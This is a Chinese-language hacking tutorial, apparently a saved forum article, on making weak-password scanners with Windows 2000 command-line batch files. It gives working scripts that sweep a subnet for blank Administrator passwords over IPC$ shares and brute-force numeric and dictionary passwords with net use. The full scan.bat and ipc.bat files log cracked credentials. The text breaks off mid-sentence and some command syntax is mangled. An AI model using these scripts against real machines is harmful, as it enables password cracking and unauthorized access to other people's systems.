Win2k命令行下自做弱口令扫描器.doc

Win2k命令行下自做弱口令扫描器 Win2k命令行下自做弱口令扫描器关键词： Win2k命令行下自做弱口令扫描器??????????????????????????????????????????几天前在安全焦点上看见web_wolf的一篇帖子“173字节的nt_server弱口令扫描器”内容如下： 批处理文件test.bat-------------------@echo offecho 格式：test *.*.*test.txtfor /L %%G in (1 1 254) do echo %1.%%G test.txt net use \\%1.%%G\ipc$ /use:Administrator | find 命令成功完成 test.txt 这个批处理文件的功能是对你指定的一个C类网段中的254个ip依次试建立帐号为administrator口令为空的ipc$连接，如果成功就把结果记录在test.txt。短短173字节，就实现了弱口令扫描的功能！惊叹web_wolf思维之独到并感慨吾等菜鸟何日能成正果之时，不禁也有所悟：win2k命令行命令也可以用来远程破解NT弱口令！我们知道，在win2k命令行下有个for命令，其功能是对一组文件中的每一个文件执行某个特定命令，也就是可以用你指定的循环范围生成一系列命令。For命令的格式为：FOR %variable IN (set) DO command [command-parameters]当然，for命令最强大的功能，表现在它的一些高级应用中。譬如可以用 /r 参数遍历整个目录树；可以用 /f 参数将文本文件内容作为循环范围；可以用 /f 参数将某一命令执行结果作为循环范围等等。在这里我不一一说明其用法，如果你不熟悉for命令，可以参考相关资料教程。For命令应用最简单的例子，就是人工指定循环范围，然后对每个值执行指定的命令如果我们把密码做为循环值，把net use命令作为指定命令。那将会产生什么样的效果呢？请看下面的命令：for /l %i in (100,1,999) do net use \ipipc$ %i /user: username解释一下：username是你用nbtstat得到的用户名，这条命令的功能是对指定username进行3位数纯数字密码依次尝试建立ipc连接，直到建立成功或者数字全部试完。如果你网速够快的话，跑完这900个数字也需要多长时间。也许你想到了，如果对方密码不是纯数字怎么办？有办法！我们还可以用字典，上面不是提到了可以用 /f 参数将文本文件内容作为循环范围吗？for /f %i in (pass.txt) do net use \ipipc$ %i /user:usernamepass.txt是字典文件，其格式为一个密码占一行。例如：123123412345abcabcd 这条命令的功能是对指定帐号username用密码字典pass.txt中的密码依次尝试建立ipc连接，直到建立成功或者密码全部试完。可问题还是有，虽然这样我们碰巧是能连接成功，可我们仍然不知道密码啊，下次要用还得重新全部试过。 我们应该想办法把尝试成功的用户名和密码保存在指定文件才行啊！以下是我实验后的结果，也许不是什么好方法，但是完全可以实现对指定ip扫描并且把结果保存在指定文件。由于我们现在要实现的功能不是一句命令所能完成的，所以我们把所有命令写成批处理文件。先提醒一下，在批处理文件中使用 FOR 命令时，指定变量使用 %%variable,而不是%variable。将下面内容存为scan.bat: @echo offecho Written By ypy %4echo Email:ypy_811@ %4echo --------------------------------- %4date /t %4time /t %4echo ---- %4echo Result：%4start scan… /min cmd /c for /f %%i in (%2) do call ipc.bat %1 %%i %3 %4exit 将下面内容存为ipc.bat: net use \%1ipc$ %2 /user:%3goto result%ERRORLEVEL%:result0echo Remote Server：%1 %4echo Username：%3 %4echo Password：%2 %4echo ---- %4net use \%1ipc$ /delexit:result2 ipc.bat中的%ERRORLEVEL%表示取前一命令执行后的返回结果。net use命令